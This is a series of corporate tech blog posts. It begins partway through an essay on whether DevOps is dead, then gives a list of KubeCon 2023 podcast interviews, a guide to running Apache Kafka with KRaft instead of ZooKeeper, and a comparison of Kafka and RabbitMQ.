Gartner analyst Lydia Leong, in an article on CloudPundit, sizes the situation up a bit differently. She writes that developer responsibility and/or control over infrastructure shouldn't be an all-or-nothing proposition. ”Responsibility can be divided across the application life cycle…without necessarily parachuting your developers into an untamed and unknown wilderness and wishing them luck in surviving because it’s not an Infrastructure & Operations (I&O) team problem anymore.”

Leong says that the solution lies in finding the right balance between “Dev” and “Ops” in DevOps. She notes that this sweet spot will be different for every organization. It’s a delicate equation that requires conversations about “autonomy, governance, and collaboration, and no two organizations are likely to arrive at the exact same balance.”

Taking the issue a step further, Sid Palas’ widely quoted Twitter thread reads, “Most developers don't like dealing with infrastructure. They want to write code and run it somewhere but don't care much where that is.”

An InfoWorld article penned by managing editor Scott Carey, entitled “Devs don’t want to do ops” prompted a raucous Reddit romp that continued the debate: “The article is kinda right? I mean, most of the devs I worked with didn't want to learn ops, they were just using the ops role recklessly. For example setting PHP memory limit to -1 and f--k it.” Another Redditor wrote, “Who cares what some disgruntled devs want. The author of that book was probably talking about the fact that devs don't want to be concerned with the infrastructure itself but would handle the engineering aspect of it through software.”

While my personal opinion is that Reddit is the cesspool of the Internet, the latter comment is where the issue actually starts to get teeth. Because maybe the root of the problem with DevOps isn’t about whether developers want to “do” ops. Maybe they’re just overwhelmed. Maybe the problem that needs addressing is that most companies are simply doing DevOps wrong.

Haigh’s take is that the DevOps methodology is morphing into an approach that focuses on enablement and engagement, so IT teams can grow within their infrastructure and cloud-native environments in a sustainable way. And that, she says, is where platform engineering comes in.

Is platform engineering DevOps 2.0?

Where all the articles, threads, and posts seem to converge (if you scroll far enough), is that to truly fulfill the DevOps “agenda”—ensuring that developers are writing software that runs well on its intended infrastructure—companies should be building standard infrastructure and self-service interfaces. Providing developers with digital platforms that deliver software at scale would empower them to build high-quality applications without becoming operations experts. Who would build and maintain these platforms? Dedicated platform-engineering teams.

In August of last year, Gartner put platform engineering on its Gartner Hype Cycle for Emerging Technologies, defining it as “the discipline of building and operating self-service Internal Developer Platforms (IDPs) for software delivery and life cycle management.” (Side note: platform engineering actually predates DevOps, having emerged in the early 2000s.)

If you return to Sid Palas’ Twitter thread, you’ll start feeling a sense of dejà vu. “The challenge then becomes moving up the control axis without exiting the Developer Comfort Zone. This is where platform engineering comes into play!” he wrote. “Platform engineers build the tooling and abstractions around the complex infrastructure configurations such that most software engineers don't need to worry about those aspects as much. The resulting system is what is known as an ‘Internal Developer Platform.’ (IDP).” Mic drop!

If you feel a bit dizzy, join the club. There are a wide array of personalities chiming in on this conversation and as many ways of slicing and dicing the same issues.

That said, let me return to answering the question I posed in this post’s headline. In my quest to decide whether to run out and buy a new black dress to mourn the passing of DevOps, I considered the entire range of opinions, from the experts at Gartner to the rabble-rousers on Reddit. At the end of the day, the conclusion seems clear: no, DevOps isn’t dead. It’s just growing up.

We'd love to meet you. Connect with Outshift on Slack!

Live from Amsterdam: CloudUnfiltered's Exclusive Interviews at KubeCon + CloudNativeCon Europe 2023

Brianna Blacet — Thu, 20 Apr 2023 21:44:26 +0000

Hosted by Michael Chenetz—Product Marketing Leader, Product Led Growth, Emerging Technologies & Incubations Group, Cisco—the CloudUnfiltered Podcast is live at KubeCon + Cloud NativeCon EU 2023, conducting a series of exciting interviews with leading experts from the worlds of Kubernetes, cloud, and open source. Enjoy!

Cortney Nickerson and Wito Delnat: Monokle, Developer Tools, and Making Kubernetes More Accessible. Mike interviews Kubeshop's Cortney Nickerson, Developer Advocate, and Wito Delnat, Lead Software Engineer.

Kubeshop's mission is to build a thriving open source ecosystem and pipeline of next-generation Kubernetes and cloud native products and projects.

Márk Sági-Kazár on Innovation and Emerging Technology. Mike interviews Márk Sági-Kazár, Cisco's Open Source Technology Lead and Ambassador for the Cloud Native Computing Foundation.

Google’s Nicholas Eberts and Mike Ensor on Google Kubernetes Engine. Mike interviews Google's Nick Eberts, Enterprise Application Modernization Engineer, and Mike Enso, Senior Distributed Cloud Solution Architect.

Phil Estes on the Irony of Big Tech Running to Catch up with OSS. Mike interviews Phil Estes, Principal Engineer at Amazon Web Services (AWS).

Matt Jarvis on Supply-Chain Security. Mike interviews Matt Jarvis, Developer Relations, Snyk/Vice Chair, OpenUK/Ambassador, Cloud Native Computing Foundation (CNCF).

Snyk is a platform that allows you to scan, prioritize, and fix security vulnerabilities in your own code, open source dependencies, container images, and infrastructure as code (IaC).

Panel Discussion: Community, Caring, and Inclusiveness.

Featuring:

Kim McMahon, Product Marketing Leader, Product Led Growth, Emerging Technologies & Incubations Group, Cisco.
Bart Farrel, Cloud Native Community Consultant/Content Creator/CNCF Ambassador, Data on Kubernetes (DoK). Bart helps tech companies expand their audience through content that stands out from the rest.
Lisa Marie-Namphy, Head of Developer Relations, Cockroach Labs. Cockroach Labs is the company behind CockroachDB, the cloud native, distributed SQL database that provides next-level consistency, ultra-resilience, data locality, and massive scale to modern cloud applications.
Sharone Zitzman, Chief Manual Reader, RTFM Please. RTFM Please provides the full lifecycle of services for developer-focused marketing—empowering internal engineering groups to tell their engineering stories through improved developer experience.

Alex Jones Shares the Deets on K8s GPT. Mike interviews Alex Jones, Founder of k8sgpt.ai/ Director of Kubernetes Engineering at Canonical Ltd./Tech Lead TAG App Delivery, CNCF.

Canonical Ltd. is a UK-based privately held computer software company founded and funded by South African entrepreneur Mark Shuttleworth to market commercial support and related services for Ubuntu and related projects.

Acorn Labs’ Shannon Williams and Darren Shephard on Simplifying Kubernetes App Development. Mike interviews Shannon Williams, Co-founder, Acorn Labs/Co-founder and President, Rancher Labs, together with Darren Shephard, Chief Architect and Co-founder, Acorn Labs/Founder and Chief Architect, Rancher Labs.

Acorn simplifies app deployment on Kubernetes by introducing a standardized application artifact that runs consistently across dev, test, and production environments. Rancher Labs provides an open source container management software for enterprises. It leverages containers to accelerate software development and improve IT operations.

Dinesh Majrekar on the Origins of Civo, the Cloud Native Service Provider. Mike interviews Dinesh Majrekar, CTO at Civo.com.

Civo is a cloud native service provider enabling companies to host core applications with ease, helping speed up development, increase productivity, and reduce costs.

Loris Degioanni and Sysdig: The Origin Story. Mike interviews Loris Degioanni, CTO and Founder at Sysdig.

Sysdig provides security and visibility to confidently run containers, Kubernetes, and cloud services. Its platform is built on open standards (Falco and Sysdig OSS) and offers a single view of risk across cloud services, containers, and hosts.

David Magton on Cloud-Native Consulting and Managed Services. Mike interviews David Magton, CEO of Palark GmbH.

Palark is an all-in-one DevOps & SRE service provider based in Germany that helps organizations of all sizes build, deploy, and operate software quickly, efficiently and securely.

Frederick Kautz on Zero Trust and “Shift-Left” Security. Mike interviews Frederick Kautz, Co-Chair, KubeCon NA 2022/Cloud Native Infra and Security Enterprise Architect, Carelon.

Carelon offers care models designed to simplify the navigation and management of complex health conditions, platform-based digital tools that connect the healthcare ecosystem for more powerful and accessible information, and convenient services such as home prescription delivery and virtual care.

The Continued Relevance of Java in a Containerized World. Mike interviews the legendary Arun Gupta, author and Vice President and General Manager for Open Ecosystem at Intel.

Enabling Women's Success in Technology. Mike interviews superstar Katie Gamanji, winner of the WITAwards and TechWomen100, about hot tech topics and Women in technology.

We'd love to meet you. Connect with Outshift on Slack!

It’s Time to Break Out of the Zoo: Running Apache Kafka® without ZooKeeper™

Brianna Blacet — Mon, 03 Apr 2023 23:03:16 +0000

Have you ever heard the Simon and Garfunkel song “At the Zoo?” The lyrics begin, “Someone told me it’s all happening at the zoo.” Well, if you’re talking about Apache Kafka®, it’s the exact opposite: the zookeeper has retired and gone home to watch Netflix.

In October of 2022, the Apache Software Foundation released Kafka 3.3.1—the first release that included a production-ready version of KRaft (Kafka Raft) consensus protocol. This simplified Kafka management by eliminating the need to use Apache ZooKeeper™ to manage and secure a Kafka deployment. (Note: Kafka 3.4 provides for migration from ZooKeeper to KRaft. ZooKeeper is deprecated in 3.4 and Apache plans to remove it completely in version 4.0.)

The KRaft advantage

There are a number of reasons why it made sense for Apache to deprecate ZooKeeper:

It's much more convenient to use one component instead of two.
Kafka clusters support up to 200,000 partitions. When adding Kafka brokers to or removing them from a cluster, it forces a rejiggering of leader elections. This can overload ZooKeeper and (temporarily) slow performance to a crawl. KRaft mitigates this scale problem.
ZooKeeper’s metadata can sometimes become out of sync with Kafka’s cluster metadata.
ZooKeeper’s security lags behind Kafka’s.

Enter KRaft.

KRaft is an event-based version of the Raft consensus algorithm. It uses an event log to store the state, periodically adding snapshots to save storage space. Because the state data is distributed within the metadata topic—as opposed to retrieving it from a separate tool—it dramatically improves the worst-case recovery time, decreasing the window of unavailability. It can also handle a much larger number of partitions per cluster.

How it works

KRaft uses multiple quorum controllers to manage Kafka metadata. When the KRaft quorum controllers start up, they designate a leader within the group. The leader is responsible for receiving updates from brokers and making metadata changes. The other quorum controllers, called "followers,” replicate the leader's state and metadata changes. This ensures that all quorum controllers have consistent metadata.

When a metadata change occurs, the leader broadcasts the change to all of the follower controllers. The followers acknowledge the change and apply it to their own metadata states. If a follower fails to acknowledge the change, the leader will retry until a quorum of followers acknowledges the change. This process provides a more resilient and fault-tolerant approach to metadata management than the ZooKeeper-based architecture provides.

Other benefits of Kafka with KRaft include:

Improved scalability: KRaft allows Kafka brokers to scale horizontally, allowing for better distribution of workload.
Improved message delivery reliability: KRaft provides more consistent replication and message delivery guarantees, reducing the risk of data loss or corruption.
Simplified configuration management: KRaft reduces the administrative overhead of managing large Kafka deployments.
Improved security features: This new and improved version of Kafka comes with support for TLS 1.3, authentication using OAuth 2.0, and support for Java 11.

How to upgrade to and configure Kafka 3.4 with KRaft

The Apache.org Kafka documentation describes how to upgrade to Kafka version 3.4.0 from previous versions of Kafka through 3.3x, as well as how to upgrade a KRaft-based cluster to 3.4.0 from any version of Kafka from 3.0.x through 3.3.x. Both appear below (copied mostly verbatim—with the omission of instructions for upgrading versions prior to 2.1x-for your convenience). If you are upgrading from a version prior to 2.1x, I recommend visiting the documentation link above, since it’s a bit more complicated and may impact performance.

For a rolling upgrade to 3.4.0 from a Kafka version using ZooKeeper:

Update server.properties on all brokers and add the following properties:

Set inter.broker.protocol.version=CURRENT_KAFKA_VERSION (CURRENT_KAFKA_VERSION refers to the version you are upgrading from, e.g., 3.3, 3.2, etc.)
Upgrade the brokers one at a time: shut down the broker, update the new version of Kafka, then restart it. Once you have done so, the brokers will be running the latest version and you can verify that the cluster's behavior and performance meets expectations. It is still possible to downgrade at this point if there are any problems.
Once the cluster's behavior and performance has been verified, bump the protocol version by editing inter.broker.protocol.version and setting it to 3.4.
Restart the brokers one by one for the new protocol version to take effect. Once the brokers begin using the latest protocol version, it will no longer be possible to downgrade the cluster to an older version.

Upgrading a KRaft-based cluster to 3.4.0 from any version 3.0.x through 3.3.x

If you are upgrading from a version prior to 3.3.0, please note that once you have changed the metadata.version to the latest version, it will not be possible to downgrade to a version prior to 3.3-IV0. Please refer to the Apache documentation for more information.

For a rolling upgrade:

Upgrade the brokers one at a time: shut down the broker, update the code, and restart it. Once you have done so, the brokers will be running the latest version and you can verify that the cluster's behavior and performance meets expectations.
Once the cluster's behavior and performance has been verified, bump the metadata.version by running ./bin/kafka-features.sh upgrade --metadata 3.4

Running Kafka with KRaft

Once you’ve upgraded Kafka to leverage KRaft, it’s time to start it up and set up your clusters. Here’s the rundown, again, courtesy of the Apache documentation. (Note: Your local environment must have Java 8+ installed.)

Here’s how to get started:

First, generate a cluster UUID:



$ KAFKA\_CLUSTER\_ID="$(bin/kafka-storage.sh random-uuid)"

Next, format the log directories:



$ bin/kafka-storage.sh format -t $KAFKA\_CLUSTER\_ID -c config/kraft/server.properties

Finally, start the Kafka server:



$ bin/kafka-server-start.sh config/kraft/server.properties

Once the Kafka server has successfully launched, you will have a basic Kafka environment running and ready to use. From there, you’ll set up your topics, write/read events into/from the topics, and continue on your merry way.

We'd love to meet you. Connect with Outshift on Slack!

Apache Kafka® vs. RabbitMQ™: Battle of the (Message) Brokers

Brianna Blacet — Thu, 23 Mar 2023 03:33:00 +0000

Apache Kafka® and RabbitMQ™ are both popular messaging systems—each with its respective strengths, weaknesses, and ideal use cases. So, how should you decide what’s right for your applications and environment?

In this blog, we’ll break down the key differences between these two streaming platforms, describe the best use cases for each one, and give examples of some large enterprises who are leveraging one or the other (or both) for their applications.

Comparing architectures, protocols, and scalability

First off, it’s important to distinguish between these two platforms’ architecture. Kafka is a distributed broadcast-style message broker that does not rely on a message queue, but instead uses a write-only log. It saves messages to disk, appending the log for consumers to read, until it reaches capacity. Because the data persists, subscribers can go back in time to consume them (an example is a newsfeed, where some people post and others can read them as they are posted or scroll back in time to read them later). Kafka also lets users batch messages, which allows for higher throughput.

In contrast, RabbitMQ is a message broker designed to validate, route, and store communication between applications and services. Like a human translator, it lets these parties speak directly to each other, regardless of the languages they use or the platforms on which they are running. Unlike Kafka, RabbitMQ deletes messages after completing their delivery.

Kafka organizes messages in what it calls “topics.” A topic holds information that logically belongs together. An example might be “payment_processed.” Topics can be consumed by one or more consumers, which might live in different domains. This information may be consumed by “shipping_consumer,” for example, and later by “notification_consumer.” When a subscriber consumes a message, Kafka marks it as “read,” but, as mentioned earlier, does not delete the data.

RabbitMQ is designed to handle message-based communication between applications and is optimized for quick, reliable, message delivery to one consumer at a time, asynchronously. A great non-digital analog might be Starbucks. You place your order with the barista (analogous to a broker), who is processing multiple orders. You don’t receive your order immediately. Instead, you wait in a queue with other customers. When your order is complete, your cup is delivered with only one name on it—yours. In other words, this one barista serves multiple customers, delivering their individual orders, one at a time.

Both of these messaging platforms are scalable. Kafka’s distributed architecture gives it the advantage where it comes to throughput and processing speed. The difference isn’t trivial: Kafka can handle millions of messages per second. RabbitMQ—which allows you to create a structured architecture for publishers and consumers and can be configured to have nodes devoted to specific queues (each processed by only one consumer, as in the Starbucks example)—can handle hundreds of thousands of messages per second.

Which platform will meet your specific needs?

Rabbit MQ and Kafka shine in different areas, so your choice should depend on your organizations’ use cases.

Here are some of the best use cases for Kafka:

Industries such as finance, healthcare, and e-commerce applications. All of these require high-volume, real-time data streams, which is where Kafka excels.
Kafka is also perfect for fraud detection, user-behavior analytics, and predictive maintenance, since all three require real-time streaming analytics and need to process and store large volumes of data.
Kafka can be used to build event-driven architectures, where events trigger actions in other systems or applications. This makes it a good fit for use cases such as microservices, IoT, and data pipelines.

Here are some of the best use cases for RabbitMQ:

As explained earlier, RabbitMQ is a great choice for use cases that don’t require real-time processing. Asynchronous task queues—such as workflow automation, background job processing, and message-based task distribution—all fall into this category.
RabbitMQ is optimized for reliable, asynchronous message delivery, making it a good fit for message-driven architectures where applications exchange messages with each other.
RabbitMQ can be used to build distributed systems, where different components communicate with each other through message passing. This makes it a good fit for use cases such as chat applications, multiplayer games, and peer-to-peer networks.

The “big dogs:” who’s using what and why?

Some of the world’s largest enterprises are using Kafka for their event-driven, streaming, and messaging applications. The platform’s scalability, reliability, and real-time processing capabilities are critical to these organizations’ success.

Here’s who’s using Kafka and for what:

LinkedIn: The company (which, by the way, originally created Kafka) uses Kafka extensively for data processing. This behemoth employs its platform to collect, process, and analyze real-time data from various sources across LinkedIn's infrastructure. One great example is its newsfeed, where millions of people post to the feed (the write-only/append functionality) and other people can read those posts either in real time or later, at their leisure.
Netflix: Kafka underpins Netflix’s real-time streaming platform, which handles millions of events per second. The platform enables Netflix to process and analyze all this data in real time, providing insights into user behavior and enabling personalized recommendations.
Uber: Among other real-time data-processing applications, Uber uses Kafka for its stream-processing framework, Flink. It enables the rideshare and delivery company to handle high volumes of real-time transactions. It also gives Uber insights into user behavior, traffic patterns, and pricing.
Airbnb: Like Uber, Airbnb has its own stream-processing framework—StreamAlert. Kafka provides Airbnb with the real-time analytics it needs to understand its user behavior and provide personalized recommendations, among other things.
Goldman Sachs: Kafka enables Goldman Sachs to process and analyze real-time market data. Its high-volume trading platform requires the scale that Kafka can provide to help its users make informed trading decisions.

Many large companies leverage RabbitMQ’s strengths for real-time communication, IoT platforms, microservices architecture, and mission-critical systems—in some cases, in addition to Kafka.

Here’s who’s using RabbitMQ and for what:

Airbnb: Although it uses Kafka for StreamAlert, Airbnb uses RabbitMQ to power its messaging platform, which enables communication between hosts. It relies on RabbitMQ’s reliable message delivery and scalability, both of which are critical for the high volume of messages exchanged on Airbnb’s platform.
Uber: Like Airbnb, Uber uses RabbitMQ, in addition to Kafka, to handle the real-time messaging exchanged between drivers and riders/customers. It also uses RabbitMQ for internal communication between different components of its systems.
Siemens: Siemens uses RabbitMQ for MindSphere, a proprietary IoT platform for industrial applications. Mindsphere uses large volumes of messages from sensors and devices, which the company needs to process and analyze in real time.
NASA: NASA’s telemetry system collects data from spacecraft and ground stations. RabbitMQ facilitates reliable and efficient message delivery, which are among its mission-critical applications.
SoundCloud: RabbitMQ enables SoundCloud’s platform to scale its microservices architecture to handle high volumes of requests. It relies on RabbitMQ for reliable message delivery and enables communication between different components of the system.

It’s a multi-platform world

In sum, there are definite differences between Kafka and RabbitMQ that make them useful for specific applications. And as you can see, they’re not mutually exclusive, either.

What should you choose?

Do you have a need for a messaging system that involves one message per person, like Starbucks? You should choose RabbitMQ.
Do you stream large volumes of data, where the data is the same but there are multiple receivers, like the Netflix example? Kafka is your best option.
Do you need to persist your data? Go Kafka.
Do you have peer-to-peer networks? RabbitMQ’s for you.

Does your company use Kafka, RabbitMQ, or both? Let me know how and why in the comments. And don't forget to connect with Outshift on Slack!